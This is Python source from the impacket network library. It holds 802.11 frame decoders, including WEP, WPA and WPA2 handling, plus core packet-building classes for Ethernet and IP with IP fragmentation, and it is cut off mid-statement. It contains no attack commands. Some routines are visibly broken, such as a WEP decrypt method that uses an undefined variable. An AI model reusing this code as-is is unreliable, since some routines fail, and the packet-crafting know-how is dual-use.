dot11.Dot11ControlFrameCFEnd(aBuffer) self.set_decoded_protocol(p) return p class Dot11ControlFrameCFEndCFACKDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ControlFrameCFEndCFACK(aBuffer) self.set_decoded_protocol(p) return p class Dot11DataDecoder(BaseDot11Decoder): def __init__(self, key_manager): BaseDot11Decoder.__init__(self, key_manager) def set_dot11_hdr(self, dot11_obj): self.dot11 = dot11_obj def decode(self, aBuffer): if self.dot11.get_fromDS() and self.dot11.get_toDS(): if self.dot11.is_QoS_frame(): p = dot11.Dot11DataAddr4QoSFrame(aBuffer) else: p = dot11.Dot11DataAddr4Frame(aBuffer) elif self.dot11.is_QoS_frame(): p = dot11.Dot11DataQoSFrame(aBuffer) else: p = dot11.Dot11DataFrame(aBuffer) self.set_decoded_protocol( p ) if not self.dot11.get_protectedFrame(): self.llc_decoder = LLCDecoder() packet = self.llc_decoder.decode(p.body_string) else: if not self.dot11.get_fromDS() and self.dot11.get_toDS(): bssid = p.get_address1() elif self.dot11.get_fromDS() and not self.dot11.get_toDS(): bssid = p.get_address2() elif not self.dot11.get_fromDS() and not self.dot11.get_toDS(): bssid = p.get_address3() else: # WDS, this is the RA bssid = p.get_address1() wep_decoder = Dot11WEPDecoder(self.key_manager) wep_decoder.set_bssid(bssid) packet = wep_decoder.decode(p.body_string) if packet is None: wpa_decoder = Dot11WPADecoder() packet = wpa_decoder.decode(p.body_string) if packet is None: wpa2_decoder = Dot11WPA2Decoder() packet = wpa2_decoder.decode(p.body_string) if packet is None: data_decoder = DataDecoder() packet = data_decoder.decode(p.body_string) p.contains(packet) return p class Dot11WEPDecoder(BaseDot11Decoder): def __init__(self, key_manager): BaseDot11Decoder.__init__(self, key_manager) self.bssid = None def set_bssid(self, bssid): self.bssid = bssid def decode(self, aBuffer): wep = dot11.Dot11WEP(aBuffer) self.set_decoded_protocol( wep ) if wep.is_WEP() is False: return None key = self.find_key(self.bssid) if key: decoded_string=wep.get_decrypted_data(key) wep_data = Dot11WEPDataDecoder() packet = wep_data.decode(decoded_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(wep.body_string) wep.contains(packet) return wep def decrypt_data(self, key_string): 'Return \'WEP Data\' decrypted' # Needs to be at least 8 bytes of payload if len(self.body_string)<8: return self.body_string # initialize the first bytes of the key from the IV # and copy rest of the WEP key (the secret part) key=self.get_iv()+key_string rc4=RC4(key) out=rc4.decrypt(data) dwd=Dot11WEPData(out) if False: # is ICV correct return dwd else: return self.body_string class Dot11WEPDataDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): wep_data = dot11.Dot11WEPData(aBuffer) if not wep_data.check_icv(): # TODO: Do something when the icv is not correct pass self.set_decoded_protocol( wep_data ) llc_decoder = LLCDecoder() packet = llc_decoder.decode(wep_data.body_string) wep_data.contains(packet) return wep_data class Dot11WPADecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer, key=None): wpa = dot11.Dot11WPA(aBuffer) self.set_decoded_protocol( wpa ) if wpa.is_WPA() is False: return None if key: decoded_string=wpa.get_decrypted_data() wpa_data = Dot11DataWPADataDecoder() packet = wpa_data.decode(decoded_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(wpa.body_string) wpa.contains(packet) return wpa class Dot11WPADataDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): wpa_data = dot11.Dot11WPAData(aBuffer) self.set_decoded_protocol( wpa_data ) llc_decoder = LLCDecoder() packet = self.llc_decoder.decode(wpa_data.body_string) wpa_data.contains(packet) return wpa_data class Dot11WPA2Decoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer, key=None): wpa2 = dot11.Dot11WPA2(aBuffer) self.set_decoded_protocol( wpa2 ) if wpa2.is_WPA2() is False: return None if key: decoded_string=wpa2.get_decrypted_data() wpa2_data = Dot11WPA2DataDecoder() packet = wpa2_data.decode(decoded_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(wpa2.body_string) wpa2.contains(packet) return wpa2 class Dot11WPA2DataDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): wpa2_data = dot11.Dot11WPA2Data(aBuffer) self.set_decoded_protocol( wpa2_data ) llc_decoder = LLCDecoder() packet = self.llc_decoder.decode(wpa2_data.body_string) wpa2_data.contains(packet) return wpa2_data class LLCDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): d = dot11.LLC(aBuffer) self.set_decoded_protocol( d ) if d.get_DSAP()==dot11.SAPTypes.SNAP: if d.get_SSAP()==dot11.SAPTypes.SNAP: if d.get_control()==dot11.LLC.DLC_UNNUMBERED_FRAMES: snap_decoder = SNAPDecoder() packet = snap_decoder.decode(d.body_string) d.contains(packet) return d # Only SNAP is implemented data_decoder = DataDecoder() packet = data_decoder.decode(d.body_string) d.contains(packet) return d class SNAPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): s = dot11.SNAP(aBuffer) self.set_decoded_protocol( s ) if s.get_OUI()==CDP.OUI and s.get_protoID()==CDP.Type: dec = CDPDecoder() packet = dec.decode(s.body_string) elif s.get_OUI()!=0x000000: # We don't know how to handle other than OUI=0x000000 (EtherType) self.data_decoder = DataDecoder() packet = self.data_decoder.decode(s.body_string) elif s.get_protoID() == ImpactPacket.IP.ethertype: self.ip_decoder = IPDecoder() packet = self.ip_decoder.decode(s.body_string) elif s.get_protoID() == ImpactPacket.ARP.ethertype: self.arp_decoder = ARPDecoder() packet = self.arp_decoder.decode(s.body_string) else: self.data_decoder = DataDecoder() packet = self.data_decoder.decode(s.body_string) s.contains(packet) return s class CDPDecoder(Decoder): def __init__(self): pass def decode(self, aBuffer): s = CDP(aBuffer) self.set_decoded_protocol( s ) return s class Dot11ManagementDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) self.subtype = None def set_subtype(self, subtype): self.subtype=subtype def decode(self, aBuffer): p = dot11.Dot11ManagementFrame(aBuffer) self.set_decoded_protocol( p ) if self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_BEACON: self.mgt_beacon_decoder = Dot11ManagementBeaconDecoder() packet = self.mgt_beacon_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST: self.mgt_probe_request_decoder = Dot11ManagementProbeRequestDecoder() packet = self.mgt_probe_request_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE: self.mgt_probe_response_decoder = Dot11ManagementProbeResponseDecoder() packet = self.mgt_probe_response_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION: self.mgt_deauthentication_decoder = Dot11ManagementDeauthenticationDecoder() packet = self.mgt_deauthentication_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION: self.mgt_Authentication_decoder = Dot11ManagementAuthenticationDecoder() packet = self.mgt_Authentication_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION: self.mgt_disassociation_decoder = Dot11ManagementDisassociationDecoder() packet = self.mgt_disassociation_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST: self.mgt_association_request_decoder = Dot11ManagementAssociationRequestDecoder() packet = self.mgt_association_request_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE: self.mgt_association_response_decoder = Dot11ManagementAssociationResponseDecoder() packet = self.mgt_association_response_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST: self.mgt_reassociation_request_decoder = Dot11ManagementReassociationRequestDecoder() packet = self.mgt_reassociation_request_decoder.decode(p.body_string) elif self.subtype is dot11.Dot11Types.DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE: self.mgt_reassociation_response_decoder = Dot11ManagementReassociationResponseDecoder() packet = self.mgt_reassociation_response_decoder.decode(p.body_string) else: data_decoder = DataDecoder() packet = data_decoder.decode(p.body_string) p.contains(packet) return p class Dot11ManagementBeaconDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementBeacon(aBuffer) self.set_decoded_protocol( p ) return p class Dot11ManagementProbeRequestDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementProbeRequest(aBuffer) self.set_decoded_protocol( p ) return p class Dot11ManagementProbeResponseDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementProbeResponse(aBuffer) self.set_decoded_protocol( p ) return p class Dot11ManagementDeauthenticationDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementDeauthentication(aBuffer) self.set_decoded_protocol( p ) return p class Dot11ManagementAuthenticationDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementAuthentication(aBuffer) self.set_decoded_protocol(p) return p class Dot11ManagementDisassociationDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementDisassociation(aBuffer) self.set_decoded_protocol(p) return p class Dot11ManagementAssociationRequestDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementAssociationRequest(aBuffer) self.set_decoded_protocol(p) return p class Dot11ManagementAssociationResponseDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementAssociationResponse(aBuffer) self.set_decoded_protocol(p) return p class Dot11ManagementReassociationRequestDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementReassociationRequest(aBuffer) self.set_decoded_protocol(p) return p class Dot11ManagementReassociationResponseDecoder(BaseDot11Decoder): def __init__(self): BaseDot11Decoder.__init__(self) def decode(self, aBuffer): p = dot11.Dot11ManagementReassociationResponse(aBuffer) self.set_decoded_protocol(p) return p impacket-0.9.10/impacket/ImpactPacket.py0000600000076500000240000017063012141750575020174 0ustar betostaff00000000000000# Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: ImpactPacket.py 737 2013-04-09 14:11:32Z bethus@gmail.com $ # # Description: # Network packet codecs basic building blocks. # Low-level packet codecs for various Internet protocols. # # Author: # Javier Burroni (javier) # Bruce Leidl (brl) # Javier Kohen (jkohen) import array import struct import socket import string import sys from binascii import hexlify """Classes to build network packets programmatically. Each protocol layer is represented by an object, and these objects are hierarchically structured to form a packet. This list is traversable in both directions: from parent to child and vice versa. All objects can be turned back into a raw buffer ready to be sent over the wire (see method get_packet). """ class ImpactPacketException(Exception): def __init__(self, value): self.value = value def __str__(self): return `self.value` class PacketBuffer: """Implement the basic operations utilized to operate on a packet's raw buffer. All the packet classes derive from this one. The byte, word, long and ip_address getters and setters accept negative indeces, having these the a similar effect as in a regular Python sequence slice. """ def __init__(self, length = None): "If 'length' is specified the buffer is created with an initial size" if length: self.__bytes = array.array('B', '\0' * length) else: self.__bytes = array.array('B') def set_bytes_from_string(self, data): "Sets the value of the packet buffer from the string 'data'" self.__bytes = array.array('B', data) def get_buffer_as_string(self): "Returns the packet buffer as a string object" return self.__bytes.tostring() def get_bytes(self): "Returns the packet buffer as an array" return self.__bytes def set_bytes(self, bytes): "Set the packet buffer from an array" # Make a copy to be safe self.__bytes = array.array('B', bytes.tolist()) def set_byte(self, index, value): "Set byte at 'index' to 'value'" index = self.__validate_index(index, 1) self.__bytes[index] = value def get_byte(self, index): "Return byte at 'index'" index = self.__validate_index(index, 1) return self.__bytes[index] def set_word(self, index, value, order = '!'): "Set 2-byte word at 'index' to 'value'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 2) ary = array.array("B", struct.pack(order + 'H', value)) if -2 == index: self.__bytes[index:] = ary else: self.__bytes[index:index+2] = ary def get_word(self, index, order = '!'): "Return 2-byte word at 'index'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 2) if -2 == index: bytes = self.__bytes[index:] else: bytes = self.__bytes[index:index+2] (value,) = struct.unpack(order + 'H', bytes.tostring()) return value def set_long(self, index, value, order = '!'): "Set 4-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 4) ary = array.array("B", struct.pack(order + 'L', value)) if -4 == index: self.__bytes[index:] = ary else: self.__bytes[index:index+4] = ary def get_long(self, index, order = '!'): "Return 4-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 4) if -4 == index: bytes = self.__bytes[index:] else: bytes = self.__bytes[index:index+4] (value,) = struct.unpack(order + 'L', bytes.tostring()) return value def set_long_long(self, index, value, order = '!'): "Set 8-byte 'value' at 'index'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 8) ary = array.array("B", struct.pack(order + 'Q', value)) if -8 == index: self.__bytes[index:] = ary else: self.__bytes[index:index+8] = ary def get_long_long(self, index, order = '!'): "Return 8-byte value at 'index'. See struct module's documentation to understand the meaning of 'order'." index = self.__validate_index(index, 8) if -8 == index: bytes = self.__bytes[index:] else: bytes = self.__bytes[index:index+8] (value,) = struct.unpack(order + 'Q', bytes.tostring()) return value def get_ip_address(self, index): "Return 4-byte value at 'index' as an IP string" index = self.__validate_index(index, 4) if -4 == index: bytes = self.__bytes[index:] else: bytes = self.__bytes[index:index+4] return socket.inet_ntoa(bytes.tostring()) def set_ip_address(self, index, ip_string): "Set 4-byte value at 'index' from 'ip_string'" index = self.__validate_index(index, 4) raw = socket.inet_aton(ip_string) (b1,b2,b3,b4) = struct.unpack("BBBB", raw) self.set_byte(index, b1) self.set_byte(index + 1, b2) self.set_byte(index + 2, b3) self.set_byte(index + 3, b4) def set_checksum_from_data(self, index, data): "Set 16-bit checksum at 'index' by calculating checksum of 'data'" self.set_word(index, self.compute_checksum(data)) def compute_checksum(self, anArray): "Return the one's complement of the one's complement sum of all the 16-bit words in 'anArray'" nleft = len(anArray) sum = 0 pos = 0 while nleft > 1: sum = anArray[pos] * 256 + (anArray[pos + 1] + sum) pos = pos + 2 nleft = nleft - 2 if nleft == 1: sum = sum + anArray[pos] * 256 return self.normalize_checksum(sum) def normalize_checksum(self, aValue): sum = aValue sum = (sum >> 16) + (sum & 0xFFFF) sum += (sum >> 16) sum = (~sum & 0xFFFF) return sum def __validate_index(self, index, size): """This method performs two tasks: to allocate enough space to fit the elements at positions index through index+size, and to adjust negative indeces to their absolute equivalent. """ orig_index = index curlen = len(self.__bytes) if index < 0: index = curlen + index diff = index + size - curlen if diff > 0: self.__bytes.fromstring('\0' * diff) if orig_index < 0: orig_index -= diff return orig_index class ProtocolLayer(): "Protocol Layer Manager for insertion and removal of protocol layers." __child = None __parent = None def contains(self, aHeader): "Set 'aHeader' as the child of this protocol layer" self.__child = aHeader aHeader.set_parent(self) def set_parent(self, my_parent): "Set the header 'my_parent' as the parent of this protocol layer" self.__parent = my_parent def child(self): "Return the child of this protocol layer" return self.__child def parent(self): "Return the parent of this protocol layer" return self.__parent def unlink_child(self): "Break the hierarchy parent/child child/parent" if self.__child: self.__child.set_parent(None) self.__child = None class ProtocolPacket(ProtocolLayer): __HEADER_SIZE = 0 __BODY_SIZE = 0 __TAIL_SIZE = 0 __header = None __body = None __tail = None def __init__(self, header_size, tail_size): self.__HEADER_SIZE = header_size self.__TAIL_SIZE = tail_size self.__header=PacketBuffer(self.__HEADER_SIZE) self.__body=PacketBuffer() self.__tail=PacketBuffer(self.__TAIL_SIZE) def __update_body_from_child(self): # Update child raw packet in my body if self.child(): body=self.child().get_packet() self.__BODY_SIZE=len(body) self.__body.set_bytes_from_string(body) def __get_header(self): return self.__header header = property(__get_header) def __get_body(self): self.__update_body_from_child() return self.__body body = property(__get_body) def __get_tail(self): return self.__tail tail = property(__get_tail) def get_header_size(self): "Return frame header size" return self.__HEADER_SIZE def get_tail_size(self): "Return frame tail size" return self.__TAIL_SIZE def get_body_size(self): "Return frame body size" self.__update_body_from_child() return self.__BODY_SIZE def get_size(self): "Return frame total size" return self.get_header_size()+self.get_body_size()+self.get_tail_size() def load_header(self, aBuffer): self.__HEADER_SIZE=len(aBuffer) self.__header.set_bytes_from_string(aBuffer) def load_body(self, aBuffer): "Load the packet body from string. "\ "WARNING: Using this function will break the hierarchy of preceding protocol layer" self.unlink_child() self.__BODY_SIZE=len(aBuffer) self.__body.set_bytes_from_string(aBuffer) def load_tail(self, aBuffer): self.__TAIL_SIZE=len(aBuffer) self.__tail.set_bytes_from_string(aBuffer) def __extract_header(self, aBuffer): self.load_header(aBuffer[:self.__HEADER_SIZE]) def __extract_body(self, aBuffer): if self.__TAIL_SIZE<=0: end=None else: end=-self.__TAIL_SIZE self.__BODY_SIZE=len(aBuffer[self.__HEADER_SIZE:end]) self.__body.set_bytes_from_string(aBuffer[self.__HEADER_SIZE:end]) def __extract_tail(self, aBuffer): if self.__TAIL_SIZE<=0: # leave the array empty return else: start=-self.__TAIL_SIZE self.__tail.set_bytes_from_string(aBuffer[start:]) def load_packet(self, aBuffer): "Load the whole packet from a string" \ "WARNING: Using this function will break the hierarchy of preceding protocol layer" self.unlink_child() self.__extract_header(aBuffer) self.__extract_body(aBuffer) self.__extract_tail(aBuffer) def get_header_as_string(self): return self.__header.get_buffer_as_string() def get_body_as_string(self): self.__update_body_from_child() return self.__body.get_buffer_as_string() body_string = property(get_body_as_string) def get_tail_as_string(self): return self.__tail.get_buffer_as_string() tail_string = property(get_tail_as_string) def get_packet(self): self.__update_body_from_child() ret = '' header = self.get_header_as_string() if header: ret += header body = self.get_body_as_string() if body: ret += body tail = self.get_tail_as_string() if tail: ret += tail return ret class Header(PacketBuffer,ProtocolLayer): "This is the base class from which all protocol definitions extend." packet_printable = filter(lambda c: c not in string.whitespace, string.printable) + ' ' ethertype = None protocol = None def __init__(self, length = None): PacketBuffer.__init__(self, length) self.auto_checksum = 1 def get_data_as_string(self): "Returns all data from children of this header as string" if self.child(): return self.child().get_packet() else: return None def get_packet(self): """Returns the raw representation of this packet and its children as a string. The output from this method is a packet ready to be transmited over the wire. """ self.calculate_checksum() data = self.get_data_as_string() if data: return self.get_buffer_as_string() + data else: return self.get_buffer_as_string() def get_size(self): "Return the size of this header and all of it's children" tmp_value = self.get_header_size() if self.child(): tmp_value = tmp_value + self.child().get_size() return tmp_value def calculate_checksum(self): "Calculate and set the checksum for this header" pass def get_pseudo_header(self): "Pseudo headers can be used to limit over what content will the checksums be calculated." # default implementation returns empty array return array.array('B') def load_header(self, aBuffer): "Properly set the state of this instance to reflect that of the raw packet passed as argument." self.set_bytes_from_string(aBuffer) hdr_len = self.get_header_size() if(len(aBuffer) < hdr_len): #we must do something like this diff = hdr_len - len(aBuffer) for i in range(0, diff): aBuffer += '\x00' self.set_bytes_from_string(aBuffer[:hdr_len]) def get_header_size(self): "Return the size of this header, that is, not counting neither the size of the children nor of the parents." raise RuntimeError("Method %s.get_header_size must be overriden." % self.__class__) def list_as_hex(self, aList): if len(aList): ltmp = [] line = [] count = 0 for byte in aList: if not (count % 2): if (count % 16): ltmp.append(' ') else: ltmp.append(' '*4) ltmp.append(string.join(line, '')) ltmp.append('\n') line = [] if chr(byte) in Header.packet_printable: line.append(chr(byte)) else: line.append('.') ltmp.append('%.2x' % byte) count += 1 if (count%16): left = 16 - (count%16) ltmp.append(' ' * (4+(left / 2) + (left*2))) ltmp.append(string.join(line, '')) ltmp.append('\n') return ltmp else: return [] def __str__(self): ltmp = self.list_as_hex(self.get_bytes().tolist()) if self.child(): ltmp.append(['\n', self.child().__str__()]) if len(ltmp)>0: return string.join(ltmp, '') else: return '' class Data(Header): """This packet type can hold raw data. It's normally employed to hold a packet's innermost layer's contents in those cases for which the protocol details are unknown, and there's a copy of a valid packet available. For instance, if all that's known about a certain protocol is that a UDP packet with its contents set to "HELLO" initiate a new session, creating such packet is as simple as in the following code fragment: packet = UDP() packet.contains('HELLO') """ def __init__(self, aBuffer = None): Header.__init__(self) if aBuffer: self.set_data(aBuffer) def set_data(self, data): self.set_bytes_from_string(data) def get_size(self): return len(self.get_bytes()) class Ethernet(Header): def __init__(self, aBuffer = None): Header.__init__(self, 14) if(aBuffer): self.load_header(aBuffer) def set_ether_type(self, aValue): "Set ethernet data type field to 'aValue'" self.set_word(12, aValue) def get_ether_type(self): "Return ethernet data type field" return self.get_word(12) def get_header_size(self): "Return size of Ethernet header" return 14 def get_packet(self): if self.child(): try: self.set_ether_type(self.child().ethertype) except: " an Ethernet packet may have a Data() " pass return Header.get_packet(self) def get_ether_dhost(self): "Return 48 bit destination ethernet address as a 6 byte array" return self.get_bytes()[0:6] def set_ether_dhost(self, aValue): "Set destination ethernet address from 6 byte array 'aValue'" for i in range(0, 6): self.set_byte(i, aValue[i]) def get_ether_shost(self): "Return 48 bit source ethernet address as a 6 byte array" return self.get_bytes()[6:12] def set_ether_shost(self, aValue): "Set source ethernet address from 6 byte array 'aValue'" for i in range(0, 6): self.set_byte(i + 6, aValue[i]) @staticmethod def as_eth_addr(anArray): tmp_list = map(lambda x: x > 15 and '%x'%x or '0%x'%x, anArray) return '' + reduce(lambda x, y: x+':'+y, tmp_list) def __str__(self): tmp_str = 'Ether: ' + self.as_eth_addr(self.get_ether_shost()) + ' -> ' tmp_str += self.as_eth_addr(self.get_ether_dhost()) if self.child(): tmp_str += '\n' + self.child().__str__() return tmp_str # Linux "cooked" capture encapsulation. # Used, for instance, for packets returned by the "any" interface. class LinuxSLL(Header): type_descriptions = [ "sent to us by somebody else", "broadcast by somebody else", "multicast by somebody else", "sent to somebody else to somebody else", "sent by us", ] def __init__(self, aBuffer = None): Header.__init__(self, 16) if (aBuffer): self.load_header(aBuffer) def set_type(self, type): "Sets the packet type field to type" self.set_word(0, type) def get_type(self): "Returns the packet type field" return self.get_word(0) def set_arphdr(self, value): "Sets the ARPHDR value for the link layer device type" self.set_word(2, type) def get_arphdr(self): "Returns the ARPHDR value for the link layer device type" return self.get_word(2) def set_addr_len(self, len): "Sets the length of the sender's address field to len" self.set_word(4, len) def get_addr_len(self): "Returns the length of the sender's address field" return self.get_word(4) def set_addr(self, addr): "Sets the sender's address field to addr. Addr must be at most 8-byte long." if (len(addr) < 8): addr += '\0' * (8 - len(addr)) self.get_bytes()[6:14] = addr def get_addr(self): "Returns the sender's address field" return self.get_bytes()[6:14].tostring() def set_ether_type(self, aValue): "Set ethernet data type field to 'aValue'" self.set_word(14, aValue) def get_ether_type(self): "Return ethernet data type field" return self.get_word(14) def get_header_size(self): "Return size of packet header" return 16 def get_packet(self): if self.child(): self.set_ether_type(self.child().ethertype) return Header.get_packet(self) def get_type_desc(self): type = self.get_type() if type < len(LinuxSLL.type_descriptions): return LinuxSLL.type_descriptions[type] else: return "Unknown" def __str__(self): ss = [] alen = self.get_addr_len() addr = hexlify(self.get_addr()[0:alen]) ss.append("Linux SLL: addr=%s type=`%s'" % (addr, self.get_type_desc())) if self.child(): ss.append(self.child().__str__()) return '\n'.join(ss) class IP(Header): ethertype = 0x800 def __init__(self, aBuffer = None): Header.__init__(self, 20) self.set_ip_v(4) self.set_ip_hl(5) self.set_ip_ttl(255) self.__option_list = [] if(aBuffer): # When decoding, checksum shouldn't be modified self.auto_checksum = 0 self.load_header(aBuffer) if sys.platform.count('bsd'): self.is_BSD = True else: self.is_BSD = False def get_packet(self): # set protocol if self.get_ip_p() == 0 and self.child(): self.set_ip_p(self.child().protocol) # set total length if self.get_ip_len() == 0: self.set_ip_len(self.get_size()) child_data = self.get_data_as_string(); if self.auto_checksum: self.reset_ip_sum() my_bytes = self.get_bytes() for op in self.__option_list: my_bytes.extend(op.get_bytes()) # Pad to a multiple of 4 bytes num_pad = (4 - (len(my_bytes) % 4)) % 4 if num_pad: my_bytes.fromstring("\0"* num_pad) # only change ip_hl value if options are present if len(self.__option_list): self.set_ip_hl(len(my_bytes) / 4) # set the checksum if the user hasn't modified it if self.auto_checksum: self.set_ip_sum(self.compute_checksum(my_bytes)) if child_data == None: return my_bytes.tostring() else: return my_bytes.tostring() + child_data # def calculate_checksum(self, buffer = None): # tmp_value = self.get_ip_sum() # if self.auto_checksum and (not tmp_value): # if buffer: # tmp_bytes = buffer # else: # tmp_bytes = self.bytes[0:self.get_header_size()] # # self.set_ip_sum(self.compute_checksum(tmp_bytes)) def get_pseudo_header(self): pseudo_buf = array.array("B") pseudo_buf.extend(self.get_bytes()[12:20]) pseudo_buf.fromlist([0]) pseudo_buf.extend(self.get_bytes()[9:10]) tmp_size = self.child().get_size() size_str = struct.pack("!H", tmp_size) pseudo_buf.fromstring(size_str) return pseudo_buf def add_option(self, option): self.__option_list.append(option) sum = 0 for op in self.__option_list: sum += op.get_len() if sum > 40: raise ImpactPacketException, "Options overflowed in IP packet with length: %d" % sum def get_ip_v(self): n = self.get_byte(0) return (n >> 4) def set_ip_v(self, value): n = self.get_byte(0) version = value & 0xF n = n & 0xF n = n | (version << 4) self.set_byte(0, n) def get_ip_hl(self): n = self.get_byte(0) return (n & 0xF) def set_ip_hl(self, value): n = self.get_byte(0) len = value & 0xF n = n & 0xF0 n = (n | len) self.set_byte(0, n) def get_ip_tos(self): return self.get_byte(1) def set_ip_tos(self,value): self.set_byte(1, value) def get_ip_len(self): if self.is_BSD: return self.get_word(2, order = '=') else: return self.get_word(2) def set_ip_len(self, value): if self.is_BSD: self.set_word(2, value, order = '=') else: self.set_word(2, value) def get_ip_id(self): return self.get_word(4) def set_ip_id(self, value): return self.set_word(4, value) def get_ip_off(self): if self.is_BSD: return self.get_word(6, order = '=') else: return self.get_word(6) def set_ip_off(self, aValue): if self.is_BSD: self.set_word(6, aValue, order = '=') else: self.set_word(6, aValue) def get_ip_offmask(self): return self.get_ip_off() & 0x1FFF def set_ip_offmask(self, aValue): tmp_value = self.get_ip_off() & 0xD000 tmp_value |= aValue self.set_ip_off(tmp_value) def get_ip_rf(self): return self.get_ip_off() & 0x8000 def set_ip_rf(self, aValue): tmp_value = self.get_ip_off() if aValue: tmp_value |= 0x8000 else: my_not = 0xFFFF ^ 0x8000 tmp_value &= my_not self.set_ip_off(tmp_value) def get_ip_df(self): return self.get_ip_off() & 0x4000 def set_ip_df(self, aValue): tmp_value = self.get_ip_off() if aValue: tmp_value |= 0x4000 else: my_not = 0xFFFF ^ 0x4000 tmp_value &= my_not self.set_ip_off(tmp_value) def get_ip_mf(self): return self.get_ip_off() & 0x2000 def set_ip_mf(self, aValue): tmp_value = self.get_ip_off() if aValue: tmp_value |= 0x2000 else: my_not = 0xFFFF ^ 0x2000 tmp_value &= my_not self.set_ip_off(tmp_value) def fragment_by_list(self, aList): if self.child(): proto = self.child().protocol else: proto = 0 child_data = self.get_data_as_string() if not child_data: return [self] ip_header_bytes = self.get_bytes() current_offset = 0 fragment_list = [] for frag_size in aList: ip = IP() ip.set_bytes(ip_header_bytes) # copy of original header ip.set_ip_p(proto) if frag_size % 8: # round this fragment size up to next multiple of 8 frag_size += 8 - (frag_size % 8) ip.set_ip_offmask(current_offset / 8) current_offset += frag_size data = Data(child_data[:frag_size]) child_data = child_data[frag_size:] ip.set_ip_len(20 + data.get_size()) ip.contains(data) if child_data: ip.set_ip_mf(1) fragment_list.append(ip) else: # no more data bytes left to add to fragments ip.set_ip_mf(0) fragment_list.append(ip) return fragment_list if child_data: # any remaining data? # create a fragment containing all of the remaining child_data ip = IP() ip.set_bytes(ip_header_bytes) ip.set_ip_offmask(current_offset) ip.set_ip_len(20 + len(child_data)) data = Data(child_data) ip.contains(data) fragment_list.append(ip) return fragment_list def fragment_by_size(self, aSize): data_len = len(self.get_data_as_string()) num_frags = data_len / aSize if data_len % aSize: num_frags += 1 size_list = [] for i in range(0, num_frags): size_list.append(aSize) return self.fragment_by_list(size_list) def get_ip_ttl(self): return self.get_byte(8) def set_ip_ttl(self, value): self.set_byte(8, value) def get_ip_p(self): return self.get_byte(9) def set_ip_p(self, value): self.set_byte(9, value) def get_ip_sum(self): return self.get_word(10) def set_ip_sum(self, value): self.auto_checksum = 0 self.set_word(10, value) def reset_ip_sum(self): self.set_ip_sum(0x0000) self.auto_checksum = 1 def get_ip_src(self): return self.get_ip_address(12) def set_ip_src(self, value): self.set_ip_address(12, value) def get_ip_dst(self): return self.get_ip_address(16) def set_ip_dst(self, value): self.set_ip_address(16, value) def get_header_size(self): op_len = 0 for op in self.__option_list: op_len += op.get_len() num_pad = (4 - (op_len % 4)) % 4 return 20 + op_len + num_pad def load_header(self, aBuffer): self.set_bytes_from_string(aBuffer[:20]) opt_left = (self.get_ip_hl() - 5) * 4 opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)]) if len(opt_bytes) != opt_left: raise ImpactPacketException, "Cannot load options from truncated packet" while opt_left: op_type = opt_bytes[0] if op_type == IPOption.IPOPT_EOL or op_type == IPOption.IPOPT_NOP: new_option = IPOption(op_type) op_len = 1 else: op_len = opt_bytes[1] if op_len > 